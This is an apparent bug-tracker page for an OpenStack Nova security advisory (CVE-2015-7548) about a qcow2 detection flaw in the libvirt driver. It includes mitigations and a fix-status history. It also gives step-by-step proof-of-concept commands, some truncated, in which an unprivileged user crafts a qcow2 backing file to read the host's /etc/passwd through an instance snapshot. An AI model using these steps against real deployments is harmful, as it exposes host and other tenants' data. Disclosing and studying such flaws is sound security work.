[OSSA 2016-001] Unprivileged api user can access host data using instance snapshot (CVE-2015-7548)
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
OpenStack Compute (nova) |
Fix Released
|
High
|
Matthew Booth | ||
Kilo |
Fix Released
|
High
|
Matthew Booth | ||
OpenStack Security Advisory |
Fix Released
|
Critical
|
Tristan Cacqueray |
Bug Description
There is a qcow2 format vulnerability in LibvirtDriver.
LibvirtDriver.
source_format = libvirt_
...
snapshot_
disk_path,
...
snapshot_
libvirt_
The vulnerability only exists when a user can write to a raw volume which is later erroneously detected as qcow2. This means that the vulnerability is only present on systems using the libvirt driver which have defined use_cow_
libvirt.
Unfortunately, as is clear from the context this includes all instance data which, despite being owned by the qemu user, is world readable. Additionally, because the qemu-img process is executed by nova directly, it does not benefit from any confinement by libvirt. Specifically, SELinux is not likely to be a defence on a typical deployment.
I have tested this exploit on a Fedora 23 system running devstack as of 8th Dec 2015:
Ensure nova.conf contains use_cow_images = False in the DEFAULT section.
As an unprivileged api user, do:
$ nova boot --image cirros --flavor m1.tiny foo
Somewhere, run:
$ qemu-img create -f qcow2 -o backing_
Ensure bad.qcow2 is available in the foo instance.
Log into foo, and execute as root:
# dd if=bad.qcow2 of=/dev/vda conv=fsync
As an unprivileged api user, do:
$ nova image-create foo passwd
$ glance image-download <newly created image id> --file passwd
The unprivileged api now has the contents of /etc/passwd from the host locally.
Mitigations:
Nova is not vulnerable by default. The user must have configured use_cow_
Nova configurations using ceph or lvm for instance storage are not vulnerable.
An attacker must know the uuid of another user's instance in order to be able to access its data.
CVE References
description: | updated |
Changed in ossa: | |
status: | New → Incomplete |
description: | updated |
Changed in ossa: | |
status: | Incomplete → Confirmed |
importance: | Undecided → Critical |
assignee: | nobody → Tristan Cacqueray (tristan-cacqueray) |
Changed in ossa: | |
status: | Confirmed → Triaged |
Changed in ossa: | |
status: | Triaged → In Progress |
summary: |
Unprivileged api user can access host data using instance snapshot + (2015-7548) |
summary: |
Unprivileged api user can access host data using instance snapshot - (2015-7548) + (CVE-2015-7548) |
Changed in ossa: | |
status: | In Progress → Fix Committed |
information type: | Private Security → Public Security |
summary: |
- Unprivileged api user can access host data using instance snapshot - (CVE-2015-7548) + [OSSA 2016-001] Unprivileged api user can access host data using + instance snapshot (CVE-2015-7548) |
Changed in ossa: | |
status: | Fix Committed → Fix Released |
description: | updated |
Added ndipanov to help with this one